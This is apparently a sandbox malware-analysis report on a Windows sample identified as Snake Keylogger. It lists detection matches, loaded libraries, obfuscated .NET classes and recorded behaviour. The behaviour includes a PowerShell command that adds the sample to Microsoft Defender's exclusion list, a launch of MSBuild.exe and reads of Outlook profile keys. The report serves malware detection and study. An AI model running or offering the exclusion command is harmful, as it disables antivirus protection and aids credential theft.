                  Source: Process Memory Space: MSBuild.exe PID: 1016, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Nowe zam.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Nowe zam.exe.41784e8.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Nowe zam.exe.41bb708.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, zjHVUkuQsImgZBRnqb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, rW4ijJCasbbw09ngCX.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, rW4ijJCasbbw09ngCX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, rW4ijJCasbbw09ngCX.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, zjHVUkuQsImgZBRnqb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, rW4ijJCasbbw09ngCX.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, rW4ijJCasbbw09ngCX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, rW4ijJCasbbw09ngCX.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, rW4ijJCasbbw09ngCX.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, rW4ijJCasbbw09ngCX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, rW4ijJCasbbw09ngCX.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, zjHVUkuQsImgZBRnqb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@6/5@4/4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\Nowe zam.exeMutant created: \Sessions\1\BaseNamedObjects\sEzObf
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgo1nvf3.pt1.ps1Jump to behavior
                  Source: Nowe zam.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Nowe zam.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\Nowe zam.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: MSBuild.exe, 00000004.00000002.4773046764.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4773046764.0000000002EEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Nowe zam.exeReversingLabs: Detection: 23%
                  Source: unknownProcess created: C:\Users\user\Desktop\Nowe zam.exe "C:\Users\user\Desktop\Nowe zam.exe"
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Nowe zam.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Nowe zam.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Nowe zam.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Nowe zam.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, rW4ijJCasbbw09ngCX.cs.Net Code: wO55pbd8NO System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, rW4ijJCasbbw09ngCX.cs.Net Code: wO55pbd8NO System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Nowe zam.exe.5860000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Nowe zam.exe.402d568.1.raw.unpack, rW4ijJCasbbw09ngCX.cs.Net Code: wO55pbd8NO System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_04B183A0 push eax; mov dword ptr [esp], ecx0_2_04B183A4
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_04B18391 push eax; mov dword ptr [esp], ecx0_2_04B183A4
                  Source: C:\Users\user\Desktop\Nowe zam.exeCode function: 0_2_04B18A70 push eax; ret 0_2_04B18AA3
                  Source: Nowe zam.exeStatic PE information: section name: .text entropy: 7.9748723738404985
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, h2RdXWmKrOcA4lBQp9.csHigh entropy of concatenated method names: 'c7wHJddNWH', 'GEbHLEGy41', 'K13HrIIQaU', 'le8H9QNLSO', 'JebHEl4Xtc', 'Ps1HyvBTCQ', 'wJ0HQHVAud', 'HyLHPAp6gl', 'qfgHa77S9N', 'LFgHTrBeye'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, rW4ijJCasbbw09ngCX.csHigh entropy of concatenated method names: 'pbqBYOd9Iu', 'aPjBCvtV0F', 'hI2BlCQa2D', 'vKnBHYQ4WL', 'WCyB65JiWS', 'zXrBIvKloA', 'yJJBO4nFv8', 'UJrBAGAn0V', 'j43B2FuBWa', 'inwBW4qxTM'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, gf5RTS9fRSkJBoaOVI.csHigh entropy of concatenated method names: 'O68ZrAeV1r', 'hodZ9oRchi', 'YvgZkPshdk', 'bdpZhNUTSS', 'm7YZui5wWL', 'VygZSuhfqK', 'iyAZ4QtGIE', 'monZGBOj3I', 'QdEZ8QjMOD', 'DGcZd5iWS3'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, PShm6tZisUSUk72SkT.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Cy03cimoIc', 'slg3KcIfaj', 'BiH3zAlbni', 'TFgBmake2h', 'u9rBnarXNb', 'SsiB3HIi7m', 'EXqBBYUdsM', 'LgIrsCojaQIcOqADavQ'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, zjHVUkuQsImgZBRnqb.csHigh entropy of concatenated method names: 'umylfe5Idq', 'u2NlFhDxiD', 'VKvlX5njoG', 'hWlljOM8QP', 'pYylb2qTox', 'msBlecMZy4', 'T1KlwxHHkV', 'qlSlgobuFp', 'mdLlcYMOOZ', 'nn3lKUbTvL'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, S7gABjgHov821TLWvu.csHigh entropy of concatenated method names: 'bHnQgSy9mH', 'MvgQKMyJGc', 'RW4PmZmsO0', 'YtXPnwVcqf', 'DfmQdbKRDX', 'NY5QNtiGym', 'YanQUdjel3', 'MPaQfvugv7', 'unDQFkMsWa', 'HbrQXGUhdw'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, LV1AeIfEmwDFsqTsKb.csHigh entropy of concatenated method names: 'vUOpXli7j', 'rFsJ9Y0as', 'PswLEZ3o4', 'sYLsPn7ib', 'Nbk94UK3I', 'fZ61hSw0O', 'hEpn5XX8R05N7ZrcIH', 'AjHlD7OX9Uk3fqn2jk', 'PgbPTgsxA', 'BlsTqpRbr'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, jP28k7dYxlc8sWXOGn.csHigh entropy of concatenated method names: 'IdA6trv7kp', 'ek56sX2x9l', 'aGvHv6hTwd', 'gCaHueRYNA', 'zuOHS4KpRn', 'Tw0HxCfUYU', 'tWyH4scVRi', 'LLdHGddyn5', 'rjIHqsi7FF', 'WjWH8mS2Zc'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, ve1mEgYtFhYstSIOtG.csHigh entropy of concatenated method names: 'Q3uIYpj0h1', 'vDeIlp6A7I', 'L5OI6VFfeP', 'fy4IOZvb8Z', 'WS7IAemN5R', 'QfY6bpeLsD', 'NS26ekLwbr', 'OWY6wfGIp1', 'nsE6gyjVib', 'J7d6csCif9'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, d8gCKMznxhO9qoF44S.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vQBaZxqKX7', 'AroaE5G6dk', 'J2Xayf2spx', 'mEDaQFu2B8', 'my0aPE6Kpy', 'RObaaMksMv', 'CscaTldfcc'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, oWOXDZtVjZjPbnWG28.csHigh entropy of concatenated method names: 'zBxPkmZlxb', 'GTYPh4OQli', 'daJPvyJN3j', 'TIQPuudPyU', 'il4Pf74oY2', 'oIEPSD6ZXE', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, pX2IbuFtpCIMOGeXEB.csHigh entropy of concatenated method names: 'tn0PClOqph', 'C5PPlxvOlN', 'af6PHoGfdK', 'AD6P6gkL6p', 'eJgPI10A5P', 'Pr8PONHjYZ', 'yWWPAF4d5H', 'abeP2dSLFf', 'pGWPWnF9vq', 'm51P0LF1m5'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, aXocyHbAIWldAgwAaR.csHigh entropy of concatenated method names: 'q0OOC9Qiej', 'uiWOHTN7Vg', 'bejOI7cKZJ', 'ynEIKu1UfH', 'PQ1Iz0I9rI', 'zq5OmJrJLf', 'zKCOnht54b', 'kyDO3VPbT5', 'm8GOBREP1u', 'ywTO5maALF'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, lmkKaGxfLkOet2kU7o.csHigh entropy of concatenated method names: 'FKFnOJ6GEN', 'X7lnATk8EF', 'u0lnWHe1uh', 'kIbn0yZt87', 'HNvnEYtsNu', 'HaBnyn4Pks', 'k2L2PS2VraM57t5UPv', 'XkRTBDH9ICZLxrJ52K', 'oIInnSLSvH', 'ihpnBwaaDV'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, TYO6ikvbM2eiVN2xmR.csHigh entropy of concatenated method names: 'Dispose', 'EKanc7m3mm', 'aoV3hAg6X4', 'Ii3RRNihd1', 'z4bnKlE1aT', 'UdInzqpiXm', 'ProcessDialogKey', 'xYS3m6G9id', 'Mo73nf480Y', 'M9y33QUyeQ'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, B9bVDOqMLYYZuBGPwde.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fa5Tfepal0', 'uTdTFXb8oX', 'hNYTXu0WcR', 'TXJTjwWoie', 'BumTbFy44i', 'p1uTeZHuwu', 'osiTwV5jW3'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, VauhTkUpD5HOgi095m.csHigh entropy of concatenated method names: 'EX0E830vMj', 'NatENTc3lv', 'IS8Ef0YKCk', 'FKuEFNXTFW', 'kY7Ehh9I71', 'yjNEvfR8Et', 'OUSEuvsCjJ', 'fTyESq7gDB', 'dMmExR4w5p', 'sNBE4AXU40'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, ltkwIoqy7ggOna0Y7kF.csHigh entropy of concatenated method names: 'zCVa7cNILG', 'emhaDIxYxE', 'Vw8apRA4Tf', 'e6QaJFv3Tt', 'nLjatPxarg', 'jIraL5tmxh', 'QugasEj5KT', 'fvZarOZGit', 'rwda9AL2LA', 'ylOa1yEw6P'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, GKlt7LSDLcMl9C9ZIn.csHigh entropy of concatenated method names: 'WwJQW58i72', 'iNPQ0LoPNv', 'ToString', 'K7uQCCLfDT', 'heHQlVHRs1', 'vsPQHlag2O', 'FH3Q6rCqPM', 'Gb1QIpsD6j', 'CB4QOMHXS3', 'F7dQAH3kNR'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, W3VlPCLflixB2rp71i.csHigh entropy of concatenated method names: 'YOcanbCDNA', 'm5waBRJufT', 'RrCa55I8ei', 'M6XaCsx5na', 'Ul4al8RVB6', 'ACLa6Qxe1u', 'pTPaIFO6or', 'ASPPwDdXx1', 'joxPgR606P', 'IWRPcw3j9I'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, aORc8Fn3Nvyrgg7Afe.csHigh entropy of concatenated method names: 'E72O7h6cPg', 'WitODyLeBc', 'ec6OpyPWgV', 'UiFOJuTWVf', 'eP1OtlFkjx', 'VKFOLcG00q', 'dLjOs7xVaT', 'EJKOr8cpUM', 'NNdO9GvRov', 'iLAO13cCw4'
                  Source: 0.2.Nowe zam.exe.9400000.5.raw.unpack, djFCTLAxtxUimQBj8F.csHigh entropy of concatenated method names: 'ToString', 'Pj9ydSuoZ5', 'd8wyhOY73G', 'i8ayvnUU6l', 'W58yuAt0Ow', 'lIKySqYDgq', 'nBkyxrOg84', 'mX1y4frJVM', 'QMryGsSCIl', 'L1iyqT0GNB'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, h2RdXWmKrOcA4lBQp9.csHigh entropy of concatenated method names: 'c7wHJddNWH', 'GEbHLEGy41', 'K13HrIIQaU', 'le8H9QNLSO', 'JebHEl4Xtc', 'Ps1HyvBTCQ', 'wJ0HQHVAud', 'HyLHPAp6gl', 'qfgHa77S9N', 'LFgHTrBeye'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, rW4ijJCasbbw09ngCX.csHigh entropy of concatenated method names: 'pbqBYOd9Iu', 'aPjBCvtV0F', 'hI2BlCQa2D', 'vKnBHYQ4WL', 'WCyB65JiWS', 'zXrBIvKloA', 'yJJBO4nFv8', 'UJrBAGAn0V', 'j43B2FuBWa', 'inwBW4qxTM'
                  Source: 0.2.Nowe zam.exe.40b1f88.0.raw.unpack, gf5RTS9fRSkJBoaOVI.csHigh entropy of concatenated method names: 'O68ZrAeV1r', 'hodZ9oRchi', 'YvgZkPshdk', 'bdpZhNUTSS', 'm7YZui5wWL', 'VygZSuhfqK', 'iyAZ4QtGIE', 'monZGBOj3I', 'QdEZ8QjMOD', 'DGcZd5iWS3'
